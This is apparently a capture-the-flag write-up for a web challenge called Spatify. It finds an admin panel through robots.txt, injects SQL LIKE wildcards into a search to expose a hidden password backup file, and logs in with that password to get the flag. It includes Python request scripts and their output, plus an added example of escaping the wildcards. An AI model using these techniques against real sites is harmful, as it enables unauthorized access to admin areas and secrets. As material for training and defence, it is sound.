Difficulty: Easy
Points: 150
Description
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
Quick Analysis
Spatify robots.txt file discovery
Running the Burp Suite crawler (or any other crawler) against the site discovered a /robots.txt file.
What is a robots.txt file used for?
The robots.txt file tells search engine crawlers which URLs the crawler can access on your site.
Content of robots.txt
from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
file = '/robots.txt'
response = get(url + file)
print(response.text)
Output:
User-agent: *
Disallow: /superhiddenadminpanel/
Spatify's admin panel
The Spatify admin panel at /superhiddenadminpanel/ can only be accessed with a password.
Spatify search engine
The Spatify home page (/) searches for music by name.
Default listed music
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
Analyze the search SQL Query
The search requires input with at least five characters. The word common to all three music names is FEATURED, and searching for FEATURED returns the same results as the home page default music.
I assume the SQL query is based on the LIKE operator.
The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
The percent sign (%) represents zero, one, or multiple characters
The underscore sign (_) represents one, single character
LIKE syntax
SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;
Spatify Search with SQL Wildcards
Searching for FEATURE% returns the same results as the home page default music, which means the query is injectable with SQL wildcards.
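As an added illustration (not part of the original writeup), the following Python script models the search described above against an in-memory SQLite table: the vulnerable version passes the user's text straight into the LIKE pattern, so a query made of percent signs matches every row including a hidden backup record, while the hardened version escapes % and _ and declares an ESCAPE character so they match literally. The table contents, the hidden record's name, the %...% wrapping of the search term and the five-character minimum are assumptions modelled on the page.

```python
import sqlite3

# Constructed catalogue modelled on the page: three featured tracks plus one
# record the search is not meant to surface (the name is a placeholder).
ROWS = [
    ("[FEATURED] Goldn - Praz Khanal", "/static/audio/goldn.mp3"),
    ("[FEATURED] Guitar Electro Sport Trailer - Gvidon", "/static/audio/guitar.mp3"),
    ("[FEATURED] Learn SQL in 3 minutes", "/static/audio/learn_sql.mp3"),
    ("PASSWORD BACKUP", "/static/audio/secret_password_backup.txt.bak"),
]
MIN_LEN = 5  # the five-character minimum noted in the writeup (assumed check)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE music (name TEXT, src TEXT)")
    conn.executemany("INSERT INTO music VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn, q):
    """Parameterised, so not classic SQL injection, yet the user's text becomes
    the LIKE pattern itself: % and _ act as wildcards instead of literals."""
    if len(q) < MIN_LEN:
        return []
    cur = conn.execute("SELECT name FROM music WHERE name LIKE ? ORDER BY rowid",
                       ("%" + q + "%",))
    return [row[0] for row in cur]


def escape_like(q, esc="\\"):
    """Prefix the escape character, % and _ so the engine treats them literally."""
    return (q.replace(esc, esc + esc)
             .replace("%", esc + "%")
             .replace("_", esc + "_"))


def search_hardened(conn, q):
    """Same query, but the pattern is built from escaped user text and the
    ESCAPE clause tells SQLite which character neutralises wildcards."""
    if len(q) < MIN_LEN:
        return []
    cur = conn.execute(
        "SELECT name FROM music WHERE name LIKE ? ESCAPE '\\' ORDER BY rowid",
        ("%" + escape_like(q) + "%",))
    return [row[0] for row in cur]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, "%%%%%%"))  # every row, hidden one included
    print("hardened:  ", search_hardened(db, "%%%%%%"))    # no row contains a literal %
```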
Exploitation
SQL wildcard injection
List all music records by searching with five percent signs (%): q=%%%%%%
<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
Content of secret_password_backup.txt.bak
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
Output:
THISISTHEPASSWORDTOTHEADMINPANEL123321123321
The flag
import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
Output:
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
References
https://developers.google.com/search/docs/crawling-indexing/robots/intro
https://www.w3schools.com/sql/sql_like.asp